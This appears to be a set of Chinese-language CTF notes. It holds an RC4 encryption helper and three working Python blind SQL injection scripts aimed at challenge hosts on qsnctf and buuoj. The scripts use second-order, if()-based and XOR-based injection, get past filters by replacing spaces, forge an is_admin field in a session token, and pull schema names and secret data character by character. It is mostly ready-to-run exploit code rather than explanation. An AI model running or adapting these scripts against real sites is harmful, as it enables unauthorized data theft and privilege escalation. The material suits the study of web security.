RC4加密脚本
import base64
from urllib import parse
def rc4_main(key = "init_key", message = "init_message"):
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
def rc4_excrypt(plain, box):
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
cipher = "".join(res)
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
key = input("请输入密钥:\n")#"HereIsTreasure"
message = input("请输入明文:\n")
enc_base64 = rc4_main( key , message )
enc_init = str(base64.b64decode(enc_base64),'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:"+enc_url)一个二次注入_盲注脚本
import requests
import base64
import json
url = "http://challenge.qsnctf.com:32411/"
str1 = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}@#$\()*+,-./:;<=>?[\\]^`|~_&!%'
s = requests.Session()
def register(username):
data = {"username":username,"password":"123"}
r = s.post(url+'register.php',data)
#print(r.text)
def login(username):
data = {"username":username,"password":"123"}
res = requests.post(url+'login.php',data,allow_redirects=False)
cookie = res.headers['Set-Cookie'].split('=')[1]
return cookie
def home(token):
cookies = {"TOKEN":token}
r = s.get(url+'home.php',cookies=cookies)
res = r.text.split('<div class="seached-text">')[1].split('</div>')[0]
res = res.replace('<br>','\n')
#print(res)
return res
def token_fix(token):
token = bytes.fromhex(token)
token = base64.b64decode(token)
token = json.loads(token)
# print(token)
token['is_admin']=1
token = json.dumps(token)
token = base64.b64encode(token.encode())
token = token.hex()
return token
def request(username):
register(username)
token = login(username)
token = token_fix(token)
res = home(token)
return res
def database_length():
for i in range(10):
username = "admin'and length(database()) = {}#".format(i)
username = username.replace(' ','/**/')
res = request(username)
if 'No user found' not in res:
print('database_length: ',i)
return i
return 0
def database_name(length):
name = ''
for idx in range(1,length+1):
for char in str1:
payload = "admin'and substr(database(),{},1) = '{}'#".format(idx,char)
payload = payload.replace(' ','/**/')
res = request(payload)
if 'No user found' not in res:
name += char
print(name)
break
def table_length():
cnt = {}
for i in range(20):
flag = 1
for j in range(20):
flag = 0
payload = "admin'and length((select table_name from information_schema.tables where table_schema='dkctf' limit {},1))={}#".format(i,j)
payload = payload.replace(' ','/**/')
res = request(payload)
#print(res)
if 'No user found' not in res:
print('table_length: ',i,j)
cnt[i]=j
flag = 1
break
if flag == 0:
return cnt
return cnt
def table_name(cnt):
tables={}
for i in range(len(cnt)):
table = ''
for j in range(1,cnt[i]+1):
for char in str1:
payload = "admin'and substr((select table_name from information_schema.tables where table_schema='dkctf' limit {},1),{},1)='{}'#".format(i,j,char)
payload = payload.replace(' ','/**/')
res = request(payload)
#print(res)
if 'No user found' not in res:
table += char
print(i,table)
break
tables[i]=table
return tables
def column_length():
cnt = {}
for i in range(10):
flag = 1
for j in range(20):
flag = 0
payload = "admin'and length((select column_name from information_schema.columns where table_schema='dkctf' and table_name='secret' limit {},1))={}#".format(i,j)
payload = payload.replace(' ','/**/')
res = request(payload)
print(res)
if 'No user found' not in res:
print('column_length: ',i,j)
cnt[i]=j
flag = 1
break
if flag == 0:
return cnt
return cnt
def column_name(cnt):
columns={}
for i in range(len(cnt)):
column = ''
for j in range(1,cnt[i]+1):
for char in str1:
payload = "admin'and substr((select column_name from information_schema.columns where table_schema='dkctf' and table_name='secret' limit {},1),{},1)='{}'#".format(i,j,char)
payload = payload.replace(' ','/**/')
res = request(payload)
#print(res)
if 'No user found' not in res:
column += char
print(i,column)
break
columns[i]=column
return columns
def data():
flag = ''
for i in range(1,100):
for char in str1:
payload = "admin'and ord(substr((select sseeccrreett from secret),{},1))={}#".format(i,ord(char))
payload = payload.replace(' ','/**/')
res = request(payload)
#print(res)
if 'No user found' not in res:
flag += char
print(i,flag)
break
if __name__ == '__main__':
# 注库名 dkctf
# length = database_length() # 5
# database_name(length) # dkctf
# 注表名 user secret
# table_length = table_length() # {0: 4, 1: 6}
# print(table_length)
# tables = table_name(table_length) # {0: 'user', 1: 'secret'}
# print(tables)
# 注列名 注的是 secret 表 {0: 'flag', 1: 'sseeccrreett'}
# column_length = column_length()
# column_length = {0: 4, 1: 12}
# print(column_length)
# columns = column_name(column_length)
# print(columns) # {0: 'flag', 1: 'sseeccrreett'}
# 注数据 注 secret 表 sseeccrreett 列
#
data()盲注
SQL的三目运算
if(表达式1,表达式2,表达式3)
如果表达式1是正确的,那么执行表达式2,否则执行表达式3。
构建payload:if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)
如果if正确,则执行1,否则执行2,
import requests
import time
url = 'http://35a3724e-07df-4562-a21b-bfbf5b06b2d2.node4.buuoj.cn:81/index.php'
result = ''
for x in range(1, 50):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = "if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)" % (x, mid)
data = {
"id":payload
}
response = requests.post(url, data = data)
time.sleep(0.1)
if 'Hello' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)SQL异或运算
假^假=假,真^真=假,假^真=真,真^假=真。null^any=null。
当我们查询 1^0、0^1、和1的回显是正常的,而查询1^1和0^0会有报错提示。
构造0^payload,若为payload结果真,则返回…;反之…
用括号来代替空格,构造payload:1^(ascii(substr((select(flag)from(flag)),1,1))>1)
- substr():截取查询结果的从第一字符开始的一个字符
- ascii():ascii值>1指这个值不为NULL
import requests
import time
import re
url='http://a7496ddf-f4d9-410a-94da-53ab915296e3.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
max = 127
min = 0
for c in range(0,127):
s = (int)((max+min)/2)
payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
r = requests.post(url,data = {'id':payload})
time.sleep(0.1)
if 'Hello, glzjin wants a girlfriend.' in str(r.content):
max=s
else:
min=s
if((max-min)<=1):
flag+=chr(max)
break
print(flag)